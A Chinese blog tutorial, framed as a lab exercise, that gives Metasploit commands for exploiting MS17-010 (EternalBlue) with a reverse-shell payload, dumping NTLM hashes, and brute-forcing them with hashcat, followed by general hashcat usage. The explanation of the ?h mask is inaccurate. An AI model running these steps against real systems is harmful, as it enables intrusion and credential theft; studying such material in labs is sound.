Hashcat配置使用

假设已知靶机存在ms17-010漏洞,在 Metasploit终端分别输入以下命令,利用ms17-010漏洞对靶机进行溢出攻击:

use 3         //使用ms17_010_eternalblue模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
set lhost   操作机ip   // 设置本地ip地址
set payload windows/x64/meterpreter/reverse_tcp  //使用payload
set rport 445   //设置目标端口
set target 0       //设置目标操作系统类型(自动识别)
run            // 执行

1)输入 hashdump 获取靶机账户密码Hash值

将user的hash值拷贝下来

2)利用Hashcat对user账户的密码Hash值进行暴力破解

(假设已知user账户的密码是由数字、小写字母组成、长度为4的字符串)

退回kali终端,输入

hashcat -a 3 -m 1000 hash值 ?h?h?h?h --force

//说明-a 3表示使用暴力破解模式(不借助字典); -m 1000表示目标使用的Hash算法为NTLMHash (windows 操作系统特有):?h?h?h?h表示密码原文为4个字符长度,且每个字符均为数字或小写字母; --force表示忽略破解过程中的报错。

### Hashcat 命令行工具使用指南 为了获取 `hashcat` 的帮助文档或用法说明,可以直接通过命令行输入特定指令来访问详细的帮助信息。这有助于理解如何配置和运行不同的攻击模式。 #### 获取基本帮助信息 可以通过以下命令获得关于 `hashcat` 工具的基础选项和参数解释: ```bash hashcat -h ``` 这条命令会显示所有可用的命令行开关及其描述[^2]。 #### 查看版本信息和支持的哈希类型 了解当前安装的 `hashcat` 版本以及它所支持的各种哈希算法是非常重要的。可以使用如下命令完成这一操作: ```bash hashcat --version hashcat --help | less ``` 第一个命令返回软件的具体版本号;第二个命令则列出了所有的哈希类别,并且可以用分页器逐屏阅读[^5]。 #### 显示设备性能统计 对于想要优化破解过程的人来说,查看硬件加速情况下的预期速度也是很有必要的。为此,可执行下面的命令: ```bash hashcat --benchmark ``` 该命令将会测试并报告每秒能够处理多少候选密码(即 kH/s),这对于评估实际环境中的效率至关重要。 #### 启动字典攻击示例 假设有一个包含 NTLM 散列值的目标列表文件 (`hashlist.txt`) 和一个单词表 (`wordlist.txt`) ,那么启动一次简单的字典攻击的方式如下所示: ```bash hashcat -m 1000 -a 0 hashlist.txt wordlist.txt ``` 这里 `-m 1000` 表明目标散列为 NTLM 类型,而 `-a 0` 则指定了采用的是基于字典的方法来进行匹配尝试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值